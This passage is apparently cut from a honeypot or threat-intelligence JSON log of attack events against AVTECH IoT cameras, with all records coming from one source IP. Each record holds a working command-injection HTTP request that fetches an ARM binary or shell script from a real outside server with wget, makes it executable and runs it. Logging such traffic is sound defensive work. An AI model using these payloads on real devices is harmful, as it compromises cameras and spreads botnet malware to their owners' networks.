7409.       "country": "US",
7410.       "user_agent": "Snickers-Avtech",
7411.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 72.UnHAnaAW.arm7; chmod 777 72.UnHAnaAW.arm7; ./72.UnHAnaAW.arm7 w00dy.av; echo urmum_was_here HTTP/1.1",
7412.       "post_data": "",
7413.       "target_port": 9002,
7414.       "protocol": "tcp",
7415.       "tags": [
7416.         {
7417.           "cve": "",
7418.           "category": "IoT",
7419.           "description": "AVTECH Exploit"
7420.         }
7421.       ],
7422.       "event_count": 1,
7423.       "first_seen": "2020-06-01T00:49:23Z",
7424.       "last_seen": "2020-06-01T00:49:23Z"
7425.     },
7426.     {
7427.       "event_id": "19fb77491741fc2a488c3a80a00f38a5e5e5c0df008d619a341771c62c3e5706",
7428.       "source_ip_address": "35.193.32.21",
7429.       "country": "US",
7430.       "user_agent": "Snickers-Avtech",
7431.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 72.UnHAnaAW.arm7; chmod 777 72.UnHAnaAW.arm7; ./72.UnHAnaAW.arm7 w00dy.av; echo urmum_was_here HTTP/1.1",
7432.       "post_data": "",
7433.       "target_port": 7001,
7434.       "protocol": "tcp",
7435.       "tags": [
7436.         {
7437.           "cve": "",
7438.           "category": "IoT",
7439.           "description": "AVTECH Exploit"
7440.         }
7441.       ],
7442.       "event_count": 1,
7443.       "first_seen": "2020-06-01T00:49:21Z",
7444.       "last_seen": "2020-06-01T00:49:21Z"
7445.     },
7446.     {
7447.       "event_id": "21f9cc0e8845122fee99097f2ec36eebb0123e6f5528385e52d9fae6f70c9097",
7448.       "source_ip_address": "35.193.32.21",
7449.       "country": "US",
7450.       "user_agent": "Snickers-Avtech",
7451.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 72.UnHAnaAW.arm7; chmod 777 72.UnHAnaAW.arm7; ./72.UnHAnaAW.arm7 w00dy.av)&password=admin HTTP/1.1",
7452.       "post_data": "",
7453.       "target_port": 9002,
7454.       "protocol": "tcp",
7455.       "tags": [
7456.         {
7457.           "cve": "",
7458.           "category": "IoT",
7459.           "description": "AVTECH Exploit"
7460.         }
7461.       ],
7462.       "event_count": 1,
7463.       "first_seen": "2020-06-01T00:49:21Z",
7464.       "last_seen": "2020-06-01T00:49:21Z"
7465.     },
7466.     {
7467.       "event_id": "3e01e8c1e8789817ae0a1a5cf36f93a6686dfc4f00dac10b66c56ef96b4718e6",
7468.       "source_ip_address": "35.193.32.21",
7469.       "country": "US",
7470.       "user_agent": "Snickers-Avtech",
7471.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
7472.       "post_data": "",
7473.       "target_port": 8443,
7474.       "protocol": "tcp",
7475.       "tags": [
7476.         {
7477.           "cve": "",
7478.           "category": "IoT",
7479.           "description": "AVTECH Exploit"
7480.         }
7481.       ],
7482.       "event_count": 1,
7483.       "first_seen": "2020-06-01T00:49:19Z",
7484.       "last_seen": "2020-06-01T00:49:19Z"
7485.     },
7486.     {
7487.       "event_id": "e9394af9611206bfe7d36f64f6a3c54b96640bc9bd290072867bedca2418151b",
7488.       "source_ip_address": "35.193.32.21",
7489.       "country": "US",
7490.       "user_agent": "Snickers-Avtech",
7491.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 72.UnHAnaAW.arm7; chmod 777 72.UnHAnaAW.arm7; ./72.UnHAnaAW.arm7 w00dy.av)&password=admin HTTP/1.1",
7492.       "post_data": "",
7493.       "target_port": 7001,
7494.       "protocol": "tcp",
7495.       "tags": [
7496.         {
7497.           "cve": "",
7498.           "category": "IoT",
7499.           "description": "AVTECH Exploit"
7500.         }
7501.       ],
7502.       "event_count": 1,
7503.       "first_seen": "2020-06-01T00:49:19Z",
7504.       "last_seen": "2020-06-01T00:49:19Z"
7505.     },
7506.     {
7507.       "event_id": "8e770d77e8c979a622f1273e962c796b5a6ded0f68c82bff8a78e55976cbda7e",
7508.       "source_ip_address": "35.193.32.21",
7509.       "country": "US",
7510.       "user_agent": "Snickers-Avtech",
7511.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 72.UnHAnaAW.arm7; chmod 777 72.UnHAnaAW.arm7; ./72.UnHAnaAW.arm7 w00dy.av; echo urmum_was_here HTTP/1.1",
7512.       "post_data": "",
7513.       "target_port": 9200,
7514.       "protocol": "tcp",
7515.       "tags": [
7516.         {
7517.           "cve": "",
7518.           "category": "IoT",
7519.           "description": "AVTECH Exploit"
7520.         }
7521.       ],
7522.       "event_count": 1,
7523.       "first_seen": "2020-06-01T00:49:18Z",
7524.       "last_seen": "2020-06-01T00:49:18Z"
7525.     },
7526.     {
7527.       "event_id": "54e786d880b9f52d393821072da7ac618dd4e291fd9af7cc210e864f97eb5ace",
7528.       "source_ip_address": "35.193.32.21",
7529.       "country": "US",
7530.       "user_agent": "Snickers-Avtech",
7531.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 72.UnHAnaAW.arm7; chmod 777 72.UnHAnaAW.arm7; ./72.UnHAnaAW.arm7 w00dy.av)&password=admin HTTP/1.1",
7532.       "post_data": "",
7533.       "target_port": 9200,
7534.       "protocol": "tcp",
7535.       "tags": [
7536.         {
7537.           "cve": "",
7538.           "category": "IoT",
7539.           "description": "AVTECH Exploit"
7540.         }
7541.       ],
7542.       "event_count": 1,
7543.       "first_seen": "2020-06-01T00:49:16Z",
7544.       "last_seen": "2020-06-01T00:49:16Z"
7545.     },
7546.     {
7547.       "event_id": "6743a8f4cd60f83b3b9bb3767265cd375decac613abe0099ebcd762f0e056f2d",
7548.       "source_ip_address": "35.193.32.21",
7549.       "country": "US",
7550.       "user_agent": "Snickers-Avtech",
7551.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 72.UnHAnaAW.arm7; chmod 777 72.UnHAnaAW.arm7; ./72.UnHAnaAW.arm7 w00dy.av; echo urmum_was_here HTTP/1.1",
7552.       "post_data": "",
7553.       "target_port": 8443,
7554.       "protocol": "tcp",
7555.       "tags": [
7556.         {
7557.           "cve": "",
7558.           "category": "IoT",
7559.           "description": "AVTECH Exploit"
7560.         }
7561.       ],
7562.       "event_count": 1,
7563.       "first_seen": "2020-06-01T00:48:54Z",
7564.       "last_seen": "2020-06-01T00:48:54Z"
7565.     },
7566.     {
7567.       "event_id": "51bcce9975c289454815a7428387c50f9867d0103bdf68d087ca687c73394318",
7568.       "source_ip_address": "35.193.32.21",
7569.       "country": "US",
7570.       "user_agent": "Snickers-Avtech",
7571.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 72.UnHAnaAW.arm7; chmod 777 72.UnHAnaAW.arm7; ./72.UnHAnaAW.arm7 w00dy.av)&password=admin HTTP/1.1",
7572.       "post_data": "",
7573.       "target_port": 8443,
7574.       "protocol": "tcp",
7575.       "tags": [
7576.         {
7577.           "cve": "",
7578.           "category": "IoT",
7579.           "description": "AVTECH Exploit"
7580.         }
7581.       ],
7582.       "event_count": 1,
7583.       "first_seen": "2020-06-01T00:48:52Z",
7584.       "last_seen": "2020-06-01T00:48:52Z"
7585.     },
7586.     {
7587.       "event_id": "b37b42b220ccdd10a890ddb27727cbac95daaedb7b7379773853d9a42f9f68bc",
7588.       "source_ip_address": "35.193.32.21",
7589.       "country": "US",
7590.       "user_agent": "Snickers-Avtech",
7591.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 39.UnHAnaAW.arm7; chmod 777 39.UnHAnaAW.arm7; ./39.UnHAnaAW.arm7 w00dy.av; echo urmum_was_here HTTP/1.1",
7592.       "post_data": "",
7593.       "target_port": 9002,
7594.       "protocol": "tcp",
7595.       "tags": [
7596.         {
7597.           "cve": "",
7598.           "category": "IoT",
7599.           "description": "AVTECH Exploit"
7600.         }
7601.       ],
7602.       "event_count": 1,
7603.       "first_seen": "2020-06-01T00:38:57Z",
7604.       "last_seen": "2020-06-01T00:38:57Z"
7605.     },
7606.     {
7607.       "event_id": "7fe723cd2659e1488c02fd3453cd8550159b7eabdf157477f52a7ff0cc883a4c",
7608.       "source_ip_address": "35.193.32.21",
7609.       "country": "US",
7610.       "user_agent": "Snickers-Avtech",
7611.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 39.UnHAnaAW.arm7; chmod 777 39.UnHAnaAW.arm7; ./39.UnHAnaAW.arm7 w00dy.av; echo urmum_was_here HTTP/1.1",
7612.       "post_data": "",
7613.       "target_port": 7001,
7614.       "protocol": "tcp",
7615.       "tags": [
7616.         {
7617.           "cve": "",
7618.           "category": "IoT",
7619.           "description": "AVTECH Exploit"
7620.         }
7621.       ],
7622.       "event_count": 1,
7623.       "first_seen": "2020-06-01T00:38:56Z",
7624.       "last_seen": "2020-06-01T00:38:56Z"
7625.     },
7626.     {
7627.       "event_id": "97b65ee1dbfd23ab597027ba478f9ac74cb25d3d026ebfd91aae51fdb55a0c68",
7628.       "source_ip_address": "35.193.32.21",
7629.       "country": "US",
7630.       "user_agent": "Snickers-Avtech",
7631.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 39.UnHAnaAW.arm7; chmod 777 39.UnHAnaAW.arm7; ./39.UnHAnaAW.arm7 w00dy.av)&password=admin HTTP/1.1",
7632.       "post_data": "",
7633.       "target_port": 9002,
7634.       "protocol": "tcp",
7635.       "tags": [
7636.         {
7637.           "cve": "",
7638.           "category": "IoT",
7639.           "description": "AVTECH Exploit"
7640.         }
7641.       ],
7642.       "event_count": 1,
7643.       "first_seen": "2020-06-01T00:38:55Z",
7644.       "last_seen": "2020-06-01T00:38:55Z"
7645.     },
7646.     {
7647.       "event_id": "c7c460ed9b388f4f90644088ed529aa894952b8175dc88cabc6c64093b9e54e0",
7648.       "source_ip_address": "35.193.32.21",
7649.       "country": "US",
7650.       "user_agent": "Snickers-Avtech",
7651.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 39.UnHAnaAW.arm7; chmod 777 39.UnHAnaAW.arm7; ./39.UnHAnaAW.arm7 w00dy.av)&password=admin HTTP/1.1",
7652.       "post_data": "",
7653.       "target_port": 7001,
7654.       "protocol": "tcp",
7655.       "tags": [
7656.         {
7657.           "cve": "",
7658.           "category": "IoT",
7659.           "description": "AVTECH Exploit"
7660.         }
7661.       ],
7662.       "event_count": 1,
7663.       "first_seen": "2020-06-01T00:38:53Z",
7664.       "last_seen": "2020-06-01T00:38:53Z"
7665.     },
7666.     {
7667.       "event_id": "f96a2f341b14153399f21424756583a7b41f0ba505b445eab26b020b48d1c9d8",
7668.       "source_ip_address": "35.193.32.21",
7669.       "country": "US",
7670.       "user_agent": "Snickers-Avtech",
7671.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 39.UnHAnaAW.arm7; chmod 777 39.UnHAnaAW.arm7; ./39.UnHAnaAW.arm7 w00dy.av; echo urmum_was_here HTTP/1.1",
7672.       "post_data": "",
7673.       "target_port": 9200,
7674.       "protocol": "tcp",
7675.       "tags": [
7676.         {
7677.           "cve": "",
7678.           "category": "IoT",
7679.           "description": "AVTECH Exploit"
7680.         }
7681.       ],
7682.       "event_count": 1,
7683.       "first_seen": "2020-06-01T00:38:52Z",
7684.       "last_seen": "2020-06-01T00:38:52Z"
7685.     },
7686.     {
7687.       "event_id": "1e6d4c805e0b6160f2eb87eaf4c1359c356a717bb80988fc7cfdabad7edf8140",
7688.       "source_ip_address": "35.193.32.21",
7689.       "country": "US",
7690.       "user_agent": "Snickers-Avtech",
7691.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 39.UnHAnaAW.arm7; chmod 777 39.UnHAnaAW.arm7; ./39.UnHAnaAW.arm7 w00dy.av)&password=admin HTTP/1.1",
7692.       "post_data": "",
7693.       "target_port": 9200,
7694.       "protocol": "tcp",
7695.       "tags": [
7696.         {
7697.           "cve": "",
7698.           "category": "IoT",
7699.           "description": "AVTECH Exploit"
7700.         }
7701.       ],
7702.       "event_count": 1,
7703.       "first_seen": "2020-06-01T00:38:50Z",
7704.       "last_seen": "2020-06-01T00:38:50Z"
7705.     },
7706.     {
7707.       "event_id": "f1438cb8fae2bd65f12f5bec02a360085c3feec695d5b5def5c30b647dce0b10",
7708.       "source_ip_address": "35.193.32.21",
7709.       "country": "US",
7710.       "user_agent": "Snickers-Avtech",
7711.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 39.UnHAnaAW.arm7; chmod 777 39.UnHAnaAW.arm7; ./39.UnHAnaAW.arm7 w00dy.av; echo urmum_was_here HTTP/1.1",
7712.       "post_data": "",
7713.       "target_port": 8443,
7714.       "protocol": "tcp",
7715.       "tags": [
7716.         {
7717.           "cve": "",
7718.           "category": "IoT",
7719.           "description": "AVTECH Exploit"
7720.         }
7721.       ],
7722.       "event_count": 1,
7723.       "first_seen": "2020-06-01T00:38:28Z",
7724.       "last_seen": "2020-06-01T00:38:28Z"
7725.     },
7726.     {
7727.       "event_id": "c2dff605f1fc624758a7dc1d377bf15340e8c9dd57d727ffbff0fea298c543ff",
7728.       "source_ip_address": "35.193.32.21",
7729.       "country": "US",
7730.       "user_agent": "Snickers-Avtech",
7731.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 39.UnHAnaAW.arm7; chmod 777 39.UnHAnaAW.arm7; ./39.UnHAnaAW.arm7 w00dy.av)&password=admin HTTP/1.1",
7732.       "post_data": "",
7733.       "target_port": 8443,
7734.       "protocol": "tcp",
7735.       "tags": [
7736.         {
7737.           "cve": "",
7738.           "category": "IoT",
7739.           "description": "AVTECH Exploit"
7740.         }
7741.       ],
7742.       "event_count": 1,
7743.       "first_seen": "2020-06-01T00:38:26Z",
7744.       "last_seen": "2020-06-01T00:38:26Z"
7745.     },
7746.     {
7747.       "event_id": "0160295d44a8212750704e6f23e3cb019825dea440fd0fbeff9e8a6fbdf1fe2f",
7748.       "source_ip_address": "35.193.32.21",
7749.       "country": "US",
7750.       "user_agent": "Snickers-Avtech",
7751.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 38.UnHAnaAW.arm5; chmod 777 38.UnHAnaAW.arm5; ./38.UnHAnaAW.arm5 w00dy.av; echo urmum_was_here HTTP/1.1",
7752.       "post_data": "",
7753.       "target_port": 9002,
7754.       "protocol": "tcp",
7755.       "tags": [
7756.         {
7757.           "cve": "",
7758.           "category": "IoT",
7759.           "description": "AVTECH Exploit"
7760.         }
7761.       ],
7762.       "event_count": 1,
7763.       "first_seen": "2020-06-01T00:38:16Z",
7764.       "last_seen": "2020-06-01T00:38:16Z"
7765.     },
7766.     {
7767.       "event_id": "24c5f2dda353dd532dce8aa607ea69c829d2284cdf6cc2a41e38a8fff8a68938",
7768.       "source_ip_address": "35.193.32.21",
7769.       "country": "US",
7770.       "user_agent": "Snickers-Avtech",
7771.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 38.UnHAnaAW.arm5; chmod 777 38.UnHAnaAW.arm5; ./38.UnHAnaAW.arm5 w00dy.av; echo urmum_was_here HTTP/1.1",
7772.       "post_data": "",
7773.       "target_port": 7001,
7774.       "protocol": "tcp",
7775.       "tags": [
7776.         {
7777.           "cve": "",
7778.           "category": "IoT",
7779.           "description": "AVTECH Exploit"
7780.         }
7781.       ],
7782.       "event_count": 1,
7783.       "first_seen": "2020-06-01T00:38:15Z",
7784.       "last_seen": "2020-06-01T00:38:15Z"
7785.     },
7786.     {
7787.       "event_id": "0ac8c79d372f3b2506e01a0e0ff52a942b7297d00d6e62149b82920d58d02080",
7788.       "source_ip_address": "35.193.32.21",
7789.       "country": "US",
7790.       "user_agent": "Snickers-Avtech",
7791.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 38.UnHAnaAW.arm5; chmod 777 38.UnHAnaAW.arm5; ./38.UnHAnaAW.arm5 w00dy.av)&password=admin HTTP/1.1",
7792.       "post_data": "",
7793.       "target_port": 9002,
7794.       "protocol": "tcp",
7795.       "tags": [
7796.         {
7797.           "cve": "",
7798.           "category": "IoT",
7799.           "description": "AVTECH Exploit"
7800.         }
7801.       ],
7802.       "event_count": 1,
7803.       "first_seen": "2020-06-01T00:38:14Z",
7804.       "last_seen": "2020-06-01T00:38:14Z"
7805.     },
7806.     {
7807.       "event_id": "76d5c86e126d4df47c25bd78231c8475ebc464098a62bdf98f64d849c11ef504",
7808.       "source_ip_address": "35.193.32.21",
7809.       "country": "US",
7810.       "user_agent": "Snickers-Avtech",
7811.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 38.UnHAnaAW.arm5; chmod 777 38.UnHAnaAW.arm5; ./38.UnHAnaAW.arm5 w00dy.av)&password=admin HTTP/1.1",
7812.       "post_data": "",
7813.       "target_port": 7001,
7814.       "protocol": "tcp",
7815.       "tags": [
7816.         {
7817.           "cve": "",
7818.           "category": "IoT",
7819.           "description": "AVTECH Exploit"
7820.         }
7821.       ],
7822.       "event_count": 1,
7823.       "first_seen": "2020-06-01T00:38:12Z",
7824.       "last_seen": "2020-06-01T00:38:12Z"
7825.     },
7826.     {
7827.       "event_id": "135db2f82093bb85f19d94248be67b7065f1c1d599831d0e10bb2c11b2bc273c",
7828.       "source_ip_address": "35.193.32.21",
7829.       "country": "US",
7830.       "user_agent": "Snickers-Avtech",
7831.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 38.UnHAnaAW.arm5; chmod 777 38.UnHAnaAW.arm5; ./38.UnHAnaAW.arm5 w00dy.av; echo urmum_was_here HTTP/1.1",
7832.       "post_data": "",
7833.       "target_port": 9200,
7834.       "protocol": "tcp",
7835.       "tags": [
7836.         {
7837.           "cve": "",
7838.           "category": "IoT",
7839.           "description": "AVTECH Exploit"
7840.         }
7841.       ],
7842.       "event_count": 1,
7843.       "first_seen": "2020-06-01T00:38:12Z",
7844.       "last_seen": "2020-06-01T00:38:12Z"
7845.     },
7846.     {
7847.       "event_id": "3d83601e64eab47907247858ed2c0c44656b9a8faed239d328791a33a3e25c0a",
7848.       "source_ip_address": "35.193.32.21",
7849.       "country": "US",
7850.       "user_agent": "Snickers-Avtech",
7851.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 38.UnHAnaAW.arm5; chmod 777 38.UnHAnaAW.arm5; ./38.UnHAnaAW.arm5 w00dy.av)&password=admin HTTP/1.1",
7852.       "post_data": "",
7853.       "target_port": 9200,
7854.       "protocol": "tcp",
7855.       "tags": [
7856.         {
7857.           "cve": "",
7858.           "category": "IoT",
7859.           "description": "AVTECH Exploit"
7860.         }
7861.       ],
7862.       "event_count": 1,
7863.       "first_seen": "2020-06-01T00:38:09Z",
7864.       "last_seen": "2020-06-01T00:38:09Z"
7865.     },
7866.     {
7867.       "event_id": "e3a7b5546e567154e13edc8c5b796465ea67a3a113d29cf91b5919194f408dea",
7868.       "source_ip_address": "35.193.32.21",
7869.       "country": "US",
7870.       "user_agent": "Snickers-Avtech",
7871.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 38.UnHAnaAW.arm5; chmod 777 38.UnHAnaAW.arm5; ./38.UnHAnaAW.arm5 w00dy.av; echo urmum_was_here HTTP/1.1",
7872.       "post_data": "",
7873.       "target_port": 8443,
7874.       "protocol": "tcp",
7875.       "tags": [
7876.         {
7877.           "cve": "",
7878.           "category": "IoT",
7879.           "description": "AVTECH Exploit"
7880.         }
7881.       ],
7882.       "event_count": 1,
7883.       "first_seen": "2020-06-01T00:37:48Z",
7884.       "last_seen": "2020-06-01T00:37:48Z"
7885.     },
7886.     {
7887.       "event_id": "9323f8938a9226e92fa998633f5e644582e6b9d522231445c55c03150579e17f",
7888.       "source_ip_address": "35.193.32.21",
7889.       "country": "US",
7890.       "user_agent": "Snickers-Avtech",
7891.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 38.UnHAnaAW.arm5; chmod 777 38.UnHAnaAW.arm5; ./38.UnHAnaAW.arm5 w00dy.av)&password=admin HTTP/1.1",
7892.       "post_data": "",
7893.       "target_port": 8443,
7894.       "protocol": "tcp",
7895.       "tags": [
7896.         {
7897.           "cve": "",
7898.           "category": "IoT",
7899.           "description": "AVTECH Exploit"
7900.         }
7901.       ],
7902.       "event_count": 1,
7903.       "first_seen": "2020-06-01T00:37:46Z",
7904.       "last_seen": "2020-06-01T00:37:46Z"
7905.     },
7906.     {
7907.       "event_id": "e78d9021d1d877afac98ba72758d3aa2e47b1ea0eed9ab171941e4708bf7d611",
7908.       "source_ip_address": "35.193.32.21",
7909.       "country": "US",
7910.       "user_agent": "Snickers-Avtech",
7911.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh; echo snickers_was_here HTTP/1.1",
7912.       "post_data": "",
7913.       "target_port": 8139,
7914.       "protocol": "tcp",
7915.       "tags": [
7916.         {
7917.           "cve": "",
7918.           "category": "IoT",
7919.           "description": "AVTECH Exploit"
7920.         }
7921.       ],
7922.       "event_count": 1,
7923.       "first_seen": "2020-06-01T00:36:19Z",
7924.       "last_seen": "2020-06-01T00:36:19Z"
7925.     },
7926.     {
7927.       "event_id": "a775c5e7fd9780fd1af283314b732e8f679d6e6f1046c391217b529101cac586",
7928.       "source_ip_address": "35.193.32.21",
7929.       "country": "US",
7930.       "user_agent": "Snickers-Avtech",
7931.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh)&password=admin HTTP/1.1",
7932.       "post_data": "",
7933.       "target_port": 8000,
7934.       "protocol": "tcp",
7935.       "tags": [
7936.         {
7937.           "cve": "",
7938.           "category": "IoT",
7939.           "description": "AVTECH Exploit"
7940.         }
7941.       ],
7942.       "event_count": 1,
7943.       "first_seen": "2020-06-01T00:36:18Z",
7944.       "last_seen": "2020-06-01T00:36:18Z"
7945.     },
7946.     {
7947.       "event_id": "e972d42bc32f9629769781194f945e2864cd1f02e2bdb18d33616698133c5e86",
7948.       "source_ip_address": "35.193.32.21",
7949.       "country": "US",
7950.       "user_agent": "Snickers-Avtech",
7951.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh)&password=admin HTTP/1.1",
7952.       "post_data": "",
7953.       "target_port": 8139,
7954.       "protocol": "tcp",
7955.       "tags": [
7956.         {
7957.           "cve": "",
7958.           "category": "IoT",
7959.           "description": "AVTECH Exploit"
7960.         }
7961.       ],
7962.       "event_count": 1,
7963.       "first_seen": "2020-06-01T00:36:17Z",
7964.       "last_seen": "2020-06-01T00:36:17Z"
7965.     },
7966.     {
7967.       "event_id": "fd6bc925c63a2f2e563114882f2ef75e3c87731081559f1a5f49473ed059b9b0",
7968.       "source_ip_address": "35.193.32.21",
7969.       "country": "US",
7970.       "user_agent": "Snickers-Avtech",
7971.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh; echo snickers_was_here HTTP/1.1",
7972.       "post_data": "",
7973.       "target_port": 9000,
7974.       "protocol": "tcp",
7975.       "tags": [
7976.         {
7977.           "cve": "",
7978.           "category": "IoT",
7979.           "description": "AVTECH Exploit"
7980.         }
7981.       ],
7982.       "event_count": 1,
7983.       "first_seen": "2020-06-01T00:36:14Z",
7984.       "last_seen": "2020-06-01T00:36:14Z"
7985.     },
7986.     {
7987.       "event_id": "f81e5c3aa6c3562b380ac999940cea47bf8722947be23fc9c455e3219ec26d2d",
7988.       "source_ip_address": "35.193.32.21",
7989.       "country": "US",
7990.       "user_agent": "Snickers-Avtech",
7991.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh)&password=admin HTTP/1.1",
7992.       "post_data": "",
7993.       "target_port": 9000,
7994.       "protocol": "tcp",
7995.       "tags": [
7996.         {
7997.           "cve": "",
7998.           "category": "IoT",
7999.           "description": "AVTECH Exploit"
8000.         }
8001.       ],
8002.       "event_count": 1,
8003.       "first_seen": "2020-06-01T00:36:12Z",
8004.       "last_seen": "2020-06-01T00:36:12Z"
8005.     },
8006.     {
8007.       "event_id": "e1f66b47b9d819748f7faf19509e03385abe6c322d73427a5806f75de003e24a",
8008.       "source_ip_address": "35.193.32.21",
8009.       "country": "US",
8010.       "user_agent": "Snickers-Avtech",
8011.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh; echo snickers_was_here HTTP/1.1",
8012.       "post_data": "",
8013.       "target_port": 7547,
8014.       "protocol": "tcp",
8015.       "tags": [
8016.         {
8017.           "cve": "",
8018.           "category": "IoT",
8019.           "description": "AVTECH Exploit"
8020.         }
8021.       ],
8022.       "event_count": 1,
8023.       "first_seen": "2020-06-01T00:36:11Z",
8024.       "last_seen": "2020-06-01T00:36:11Z"
8025.     },
8026.     {
8027.       "event_id": "050c57534c4e5dab03f753050f6052fc188ab3064356105057a0479506286d01",
8028.       "source_ip_address": "35.193.32.21",
8029.       "country": "US",
8030.       "user_agent": "Snickers-Avtech",
8031.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh; echo snickers_was_here HTTP/1.1",
8032.       "post_data": "",
8033.       "target_port": 7001,
8034.       "protocol": "tcp",
8035.       "tags": [
8036.         {
8037.           "cve": "",
8038.           "category": "IoT",
8039.           "description": "AVTECH Exploit"
8040.         }
8041.       ],
8042.       "event_count": 1,
8043.       "first_seen": "2020-06-01T00:36:10Z",
8044.       "last_seen": "2020-06-01T00:36:10Z"
8045.     },
8046.     {
8047.       "event_id": "eacd113099db6e8ff062a5e9f21dab6e8b591dc10739f1f73581ba5eb2269eee",
8048.       "source_ip_address": "35.193.32.21",
8049.       "country": "US",
8050.       "user_agent": "Snickers-Avtech",
